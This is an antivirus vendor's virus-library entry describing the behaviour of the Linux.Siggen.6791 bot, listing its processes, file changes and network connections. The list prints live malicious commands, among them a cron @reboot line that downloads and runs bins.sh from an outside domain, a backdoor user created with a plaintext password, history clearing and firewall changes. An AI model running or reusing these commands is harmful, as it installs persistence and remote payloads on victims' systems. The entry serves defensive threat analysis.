DLA UŻYTKOWNIKÓW

Zamknij

Library
My library

+ Add to library

Search
Search

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

A query form

Call us

+7 (495) 789-45-86

Forum
Profile

PL

RU CN DE EN ES FR IT JP KZ UZ PL BY
Zamknij
Support services
Scanners
Dr.Web vxCube
Trial
VCI investigations
Virus library
Knowledge base

Technologies

Terminology

Training and education

Myths

News

Linux.Siggen.6791

Added to the Dr.Web virus database: 2024-03-18

Virus description added:

Technical Information

To ensure autorun and distribution:
Creates or modifies the following files:
  • /var/spool/cron/crontabs/root
  • /etc/init.d/job
Malicious functions:
Launches itself as a daemon
Substitutes application name for:
  • /bin/bash
Manages services:
  • ['/bin/systemctl', 'enable', 'bot']
Launches processes:
  • /usr/bin/netkit-ftp ftp -n
  • /bin/sh -c firewall-cmd --zone=public --add-rich-rule=\x27rule family=\x22ipv4\x22 port protocol=\x22tcp\x22 port=\x2237215\x22 reject\x27
  • /bin/sh -c netsh advfirewall firewall add rule name=\x22Block_Port_37215_TCP\x22 dir=in action=block protocol=TCP localport=37215
  • /bin/sh -c echo \x22block drop in quick on any from 141.98.10.128\x22 | sudo pfctl -f -
  • /bin/sh -c netsh advfirewall firewall add rule name=\x22Block_IP_141.98.10.128\x22 dir=in action=block remoteip=141.98.10.128
  • crontab -
  • /sbin/xtables-multi iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
  • /sbin/xtables-multi iptables -A INPUT -p tcp --dport 59666 -j DROP
  • /bin/sh -c firewall-cmd --zone=public --add-port=59666/udp --permanent
  • /bin/systemctl enable bot
  • /bin/sh -c echo \x22block drop proto tcp from any to any port 59666\x22 | sudo pfctl -f -
  • /bin/sh -c history -c
  • /bin/sh -c nft add rule ip filter input ip saddr 141.98.10.128 drop
  • crontab -l
  • /bin/sh -c firewall-cmd --zone=public --add-rich-rule=\x27rule family=\x22ipv4\x22 port protocol=\x22udp\x22 port=\x2237215\x22 reject\x27
  • /sbin/xtables-multi iptables -A INPUT -p udp --dport 59666 -j DROP
  • /bin/sh -c /usr/bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
  • /bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
  • useradd -m Signalbot
  • chmod 777 /bin/bins.sh
  • /bin/sh -c echo \x22block drop proto udp from any to any port 59666\x22 | sudo pfctl -f -
  • /bin/sh -c nft add rule ip filter input udp dport 37215 drop
  • /bin/sh -c busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
  • busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
  • chmod +x /bin/bins.sh
  • /sbin/initctl start bot
  • /bin/sh -c iptables -A INPUT -s 141.98.10.128 -j DROP
  • /sbin/xtables-multi iptables -A INPUT -p udp --dport 37215 -j DROP
  • /bin/sh -c ufw deny 59666/tcp
  • /bin/sh -c netsh advfirewall firewall add rule name=\x22Block_Port_59666_TCP\x22 dir=in action=block protocol=TCP localport=59666
  • /bin/sh -c iptables -A INPUT -p udp --dport 59666 -j DROP
  • /bin/sh -c echo \x22block drop proto udp from any to any port 37215\x22 | sudo pfctl -f -
  • /bin/sh -c ufw deny from 141.98.10.128
  • /bin/sh -c nft add rule ip filter input udp dport 59666 drop
  • /bin/sh -c netsh advfirewall firewall add rule name=\x22Block_Port_59666_UDP\x22 dir=in action=block protocol=UDP localport=59666
  • /bin/kmod /sbin/modprobe ip_tables
  • /bin/sh -c ufw deny 37215/tcp
  • /bin/sh -c iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
  • /bin/sh -c netsh advfirewall firewall add rule name=\x22Block_Port_37215_UDP\x22 dir=in action=block protocol=UDP localport=37215
  • /bin/sh -c firewall-cmd --reload
  • /bin/sh -c (crontab -l ; echo \x22@reboot /bin/bash -c \x22/bin/wget http://rebirthltd.com/bins.sh; chmod 777 /bin/bins.sh; /bin/sh /bin/bins.sh; /bin/curl -k -L --output /bin/bins.sh http://rebirthltd.com/bins.sh; chmod +x /bin/bins.sh; /bin/sh /bin/bins.sh\x22\x22) | crontab -
  • /bin/sh -c echo \x22block drop proto tcp from any to any port 37215\x22 | sudo pfctl -f -
  • /sbin/xtables-multi iptables -A INPUT -s 141.98.10.128 -j DROP
  • ftp -n
  • /bin/sh -c iptables -A INPUT -p tcp --dport 59666 -j DROP
  • /sbin/xtables-multi iptables -A INPUT -p tcp --dport 37215 -j DROP
  • /bin/sh -c ufw deny 37215/udp
  • /bin/sh -c iptables -A INPUT -p tcp --dport 37215 -j DROP
  • /bin/sh -c echo \x22127.0.0.1 fucktheccp.top\x22 >> /etc/hosts
  • /bin/sh -c echo \x22127.0.0.1 reachedfucktheccp.top\x22 >> /etc/hosts
  • sudo pfctl -f -
  • /bin/sh -c /bin/busybox iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
  • /bin/sh -c nft add rule ip filter input tcp dport 37215 drop
  • /bin/sh -c useradd -m Signalbot
  • /bin/sh -c firewall-cmd --zone=public --add-port=59666/tcp --permanent
  • /bin/sh -c /bin/iptables -A INPUT -p tcp --dport 26721 -j ACCEPT
  • chpasswd
  • /bin/sh -c nft add rule ip filter input tcp dport 59666 drop
  • /bin/sh -c firewall-cmd --zone=public --add-source=141.98.10.128 --permanent
  • /bin/sh -c ufw deny 59666/udp
  • /bin/sh -c echo \x22Signalbot:ufobotz1337\x22 | chpasswd
  • /bin/sh /bin/bins.sh
  • /bin/sh -c iptables -A INPUT -p udp --dport 37215 -j DROP
Kills the following processes:
  • <SAMPLE>
Performs operations with the file system:
Modifies file access rights:
  • /home/Signalbot
  • /home/Signalbot/.bashrc
  • /home/Signalbot/.profile
  • /home/Signalbot/.bash_logout
  • /etc/passwd+
  • /etc/shadow+
  • /etc/group+
  • /etc/gshadow+
  • /etc/subuid+
  • /etc/subgid+
  • /etc/nshadow
  • /var/spool/cron/crontabs/tmp.GnGmSh
  • /etc/init.d/job
Modifies file owner:
  • /home/Signalbot
  • /home/Signalbot/.bashrc
  • /home/Signalbot/.profile
  • /home/Signalbot/.bash_logout
  • /etc/passwd+
  • /etc/shadow+
  • /etc/group+
  • /etc/gshadow+
  • /etc/subuid+
  • /etc/subgid+
  • /etc/nshadow
Creates folders:
  • /home/Signalbot
Deletes folders:
  • /xconsole
  • /root/.bashrc
  • /null
Creates symlinks:
  • /etc/passwd.lock
  • /etc/group.lock
  • /etc/gshadow.lock
  • /etc/subuid.lock
  • /etc/subgid.lock
  • /etc/shadow.lock
Creates or modifies files:
  • /etc/.pwd.lock
  • /etc/passwd.832
  • /etc/group.832
  • /etc/gshadow.832
  • /etc/subuid.832
  • /etc/subgid.832
  • /etc/shadow.832
  • /var/log/faillog
  • /var/log/lastlog
  • /home/Signalbot/.bashrc
  • /home/Signalbot/.profile
  • /home/Signalbot/.bash_logout
  • /etc/passwd-
  • /etc/passwd+
  • /etc/shadow-
  • /etc/shadow+
  • /etc/group-
  • /etc/group+
  • /etc/gshadow-
  • /etc/gshadow+
  • /etc/subuid-
  • /etc/subuid+
  • /etc/subgid-
  • /etc/subgid+
  • /etc/nshadow
  • /etc/sudoers
  • /root/ip_addresses.txt
  • /etc/hosts
  • /self
  • /proc/901/cmdline
  • /dev/full
  • /var/spool/cron/crontabs/tmp.GnGmSh
  • /etc/init/bot.conf
  • /root/.bashrc
  • /lib/systemd/system/bot.service
  • /etc/systemd/system/job.service
Deletes files:
  • /etc/passwd.832
  • /etc/group.832
  • /etc/gshadow.832
  • /etc/subuid.832
  • /etc/subgid.832
  • /etc/shadow.832
  • /etc/shadow.lock
  • /etc/passwd.lock
  • /etc/group.lock
  • /etc/gshadow.lock
  • /etc/subuid.lock
  • /etc/subgid.lock
  • /xconsole
  • /root/.bashrc
  • /null
Changes time of creation/access/modification of files:
  • /home/Signalbot/.bashrc
  • /home/Signalbot/.profile
  • /home/Signalbot/.bash_logout
  • /etc/passwd-
  • /etc/shadow-
  • /etc/group-
  • /etc/gshadow-
  • /etc/subuid-
  • /etc/subgid-
  • /var/spool/cron/crontabs
Network activity:
Awaits incoming connections on ports:
  • 127.0.0.1:8345
  • 0.0.0.0:26721
Establishes connection:
  • [:##]:37215
  • 127.0.0.1:37215
  • [:##]:59666
  • 127.0.0.1:59666
  • 8.#.8.8:53
  • 51.###.162.59:53
  • 0.0.0.0:0
  • 19#.##.144.87:53
  • 19#.###.175.43:35342
  • 19#.##9.175.43:2222
  • 17#.##4.22.166:53
  • 81.###.136.222:53
  • 13#.#95.4.2:53
DNS ASK:
  • re###thltd.com

Curing recommendations

Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number